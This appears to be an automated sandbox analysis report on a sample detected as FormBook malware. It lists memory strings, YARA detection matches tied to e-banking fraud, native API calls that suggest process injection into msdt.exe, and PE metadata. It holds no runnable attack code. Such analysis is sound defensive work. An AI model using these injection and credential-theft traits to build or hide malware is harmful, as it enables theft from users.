Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: V5cfxBHd71.exe, 00000000.00000003.242605012.00000000062A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.co
Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: V5cfxBHd71.exe, 00000000.00000003.243718619.000000000627E000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com.TTF5
Source: V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/
Source: explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: V5cfxBHd71.exe, 00000000.00000003.243369085.00000000062A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers#
Source: V5cfxBHd71.exe, 00000000.00000003.242288324.00000000062A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers$
Source: V5cfxBHd71.exe, 00000000.00000003.241133154.00000000062AC000.00000004.00000001.sdmp, V5cfxBHd71.exe, 00000000.00000003.240999247.00000000062A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/
Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: V5cfxBHd71.exe, 00000000.00000003.243233476.000000000627C000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: V5cfxBHd71.exe, 00000000.00000003.243233476.000000000627C000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlu
Source: V5cfxBHd71.exe, 00000000.00000003.242570041.00000000062A9000.00000004.00000001.sdmp, V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: V5cfxBHd71.exe, 00000000.00000003.242354981.00000000062A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers:
Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: V5cfxBHd71.exe, 00000000.00000003.249525924.00000000062A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersE
Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: V5cfxBHd71.exe, 00000000.00000003.243484955.00000000062A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersb
Source: V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comF5
Source: V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comF:
Source: V5cfxBHd71.exe, 00000000.00000003.243584347.000000000627F000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comFQ
Source: V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comR.TTF
Source: V5cfxBHd71.exe, 00000000.00000003.243501826.000000000627F000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comals
Source: V5cfxBHd71.exe, 00000000.00000003.243584347.000000000627F000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comalsFC
Source: V5cfxBHd71.exe, 00000000.00000003.243584347.000000000627F000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comcom:
Source: V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comcomd
Source: V5cfxBHd71.exe, 00000000.00000003.243718619.000000000627E000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comd
Source: V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comdy
Source: V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comgrito
Source: V5cfxBHd71.exe, 00000000.00000003.256705491.0000000006270000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comm
Source: V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comrsiv
Source: V5cfxBHd71.exe, 00000000.00000003.243233476.000000000627C000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comueTFC
Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: V5cfxBHd71.exe, 00000000.00000003.235839455.00000000062AA000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: V5cfxBHd71.exe, 00000000.00000003.236344657.00000000062AF000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/
Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: V5cfxBHd71.exe, 00000000.00000003.245350985.00000000062A9000.00000004.00000001.sdmp, V5cfxBHd71.exe, 00000000.00000003.246243890.000000000627E000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/
Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: V5cfxBHd71.exe, 00000000.00000003.245511901.00000000062A9000.00000004.00000001.sdmp, V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: V5cfxBHd71.exe, 00000000.00000003.245760419.000000000628A000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmo
Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: V5cfxBHd71.exe, 00000000.00000003.238699786.000000000627D000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/)
Source: V5cfxBHd71.exe, 00000000.00000003.238966135.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/9
Source: V5cfxBHd71.exe, 00000000.00000003.238699786.000000000627D000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/:
Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/C
Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/ch
Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/d
Source: V5cfxBHd71.exe, 00000000.00000003.238699786.000000000627D000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/f
Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/help5
Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/9
Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/:
Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/f
Source: V5cfxBHd71.exe, 00000000.00000003.238699786.000000000627D000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/nly
Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/tion
Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/y
Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: V5cfxBHd71.exe, 00000000.00000003.236412505.000000000627E000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.comFI
Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: V5cfxBHd71.exe, 00000000.00000003.243718619.000000000627E000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.de
Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: V5cfxBHd71.exe, 00000000.00000003.243718619.000000000627E000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.debI
Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 4.2.V5cfxBHd71.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.V5cfxBHd71.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 4.2.V5cfxBHd71.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.V5cfxBHd71.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.V5cfxBHd71.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.V5cfxBHd71.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_004181B0 NtCreateFile,	4_2_004181B0
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_00418260 NtReadFile,	4_2_00418260
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_004182E0 NtClose,	4_2_004182E0
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_00418390 NtAllocateVirtualMemory,	4_2_00418390
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_004182AC NtReadFile,	4_2_004182AC
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_0041838B NtAllocateVirtualMemory,	4_2_0041838B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D496D0 NtCreateKey,LdrInitializeThunk,	17_2_04D496D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D496E0 NtFreeVirtualMemory,LdrInitializeThunk,	17_2_04D496E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49650 NtQueryValueKey,LdrInitializeThunk,	17_2_04D49650
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49A50 NtCreateFile,LdrInitializeThunk,	17_2_04D49A50
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49840 NtDelayExecution,LdrInitializeThunk,	17_2_04D49840
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49660 NtAllocateVirtualMemory,LdrInitializeThunk,	17_2_04D49660
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49860 NtQuerySystemInformation,LdrInitializeThunk,	17_2_04D49860
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D495D0 NtClose,LdrInitializeThunk,	17_2_04D495D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49FE0 NtCreateMutant,LdrInitializeThunk,	17_2_04D49FE0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49780 NtMapViewOfSection,LdrInitializeThunk,	17_2_04D49780
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D499A0 NtCreateSection,LdrInitializeThunk,	17_2_04D499A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49540 NtReadFile,LdrInitializeThunk,	17_2_04D49540
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49710 NtQueryInformationToken,LdrInitializeThunk,	17_2_04D49710
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49910 NtAdjustPrivilegesToken,LdrInitializeThunk,	17_2_04D49910
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D498F0 NtReadVirtualMemory,	17_2_04D498F0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49A80 NtOpenDirectoryObject,	17_2_04D49A80
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D498A0 NtWriteVirtualMemory,	17_2_04D498A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D4B040 NtSuspendThread,	17_2_04D4B040
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49670 NtQueryInformationProcess,	17_2_04D49670
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49A10 NtQuerySection,	17_2_04D49A10
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49610 NtEnumerateValueKey,	17_2_04D49610
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49A00 NtProtectVirtualMemory,	17_2_04D49A00
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49820 NtEnumerateKey,	17_2_04D49820
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49A20 NtResumeThread,	17_2_04D49A20
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D499D0 NtCreateProcessEx,	17_2_04D499D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D495F0 NtQueryInformationFile,	17_2_04D495F0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D4A3B0 NtGetContextThread,	17_2_04D4A3B0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D497A0 NtUnmapViewOfSection,	17_2_04D497A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49950 NtQueueApcThread,	17_2_04D49950
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D4A770 NtOpenThread,	17_2_04D4A770
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49770 NtSetInformationFile,	17_2_04D49770
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49560 NtWriteFile,	17_2_04D49560
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49760 NtOpenProcess,	17_2_04D49760
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D4A710 NtOpenProcessToken,	17_2_04D4A710
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49B00 NtSetValueKey,	17_2_04D49B00
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D4AD30 NtSetContextThread,	17_2_04D4AD30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49730 NtQueryVirtualMemory,	17_2_04D49730
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D49520 NtWaitForSingleObject,	17_2_04D49520
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A581B0 NtCreateFile,	17_2_00A581B0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A582E0 NtClose,	17_2_00A582E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A58260 NtReadFile,	17_2_00A58260
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A58390 NtAllocateVirtualMemory,	17_2_00A58390
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A582AC NtReadFile,	17_2_00A582AC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A5838B NtAllocateVirtualMemory,	17_2_00A5838B

Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 0_2_00EA4C65	0_2_00EA4C65
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 0_2_030AC2B0	0_2_030AC2B0
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 0_2_030A9990	0_2_030A9990
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_00401030	4_2_00401030
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_0041B8B1	4_2_0041B8B1
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_0041B963	4_2_0041B963
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_00408C4B	4_2_00408C4B
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_00408C50	4_2_00408C50
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_0041B493	4_2_0041B493
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_0041B496	4_2_0041B496
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_0041C539	4_2_0041C539
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_00402D89	4_2_00402D89
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_00402D90	4_2_00402D90
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_0041CE85	4_2_0041CE85
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_0041BF12	4_2_0041BF12
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_0041C795	4_2_0041C795
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_00402FB0	4_2_00402FB0
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_004D4C65	4_2_004D4C65
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D1B090	17_2_04D1B090
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DC1002	17_2_04DC1002
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D26E30	17_2_04D26E30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D3EBB0	17_2_04D3EBB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DD1D55	17_2_04DD1D55
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D0F900	17_2_04D0F900
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D00D20	17_2_04D00D20
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D24120	17_2_04D24120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A5B8B1	17_2_00A5B8B1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A5B954	17_2_00A5B954
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A5B496	17_2_00A5B496
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A5B493	17_2_00A5B493
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A48C4B	17_2_00A48C4B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A48C50	17_2_00A48C50
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A42D89	17_2_00A42D89
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A42D90	17_2_00A42D90
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A5C539	17_2_00A5C539
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A5CE85	17_2_00A5CE85
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A42FB0	17_2_00A42FB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A5C795	17_2_00A5C795
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A5BF12	17_2_00A5BF12

Source: V5cfxBHd71.exe	Binary or memory string: OriginalFilename vs V5cfxBHd71.exe
Source: V5cfxBHd71.exe, 00000000.00000002.257959634.00000000031D1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameConfigNodeType.dll> vs V5cfxBHd71.exe
Source: V5cfxBHd71.exe, 00000000.00000002.257092467.0000000000EA2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIdentityNotMappedExcepti.exe6 vs V5cfxBHd71.exe
Source: V5cfxBHd71.exe, 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameStoreElement.dllB vs V5cfxBHd71.exe
Source: V5cfxBHd71.exe	Binary or memory string: OriginalFilename vs V5cfxBHd71.exe
Source: V5cfxBHd71.exe, 00000004.00000002.352461046.00000000004D2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIdentityNotMappedExcepti.exe6 vs V5cfxBHd71.exe
Source: V5cfxBHd71.exe, 00000004.00000002.353531484.000000000109F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs V5cfxBHd71.exe
Source: V5cfxBHd71.exe, 00000004.00000002.354477795.0000000002EE0000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamemsdt.exej% vs V5cfxBHd71.exe

Source: V5cfxBHd71.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 4.2.V5cfxBHd71.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.V5cfxBHd71.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.V5cfxBHd71.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
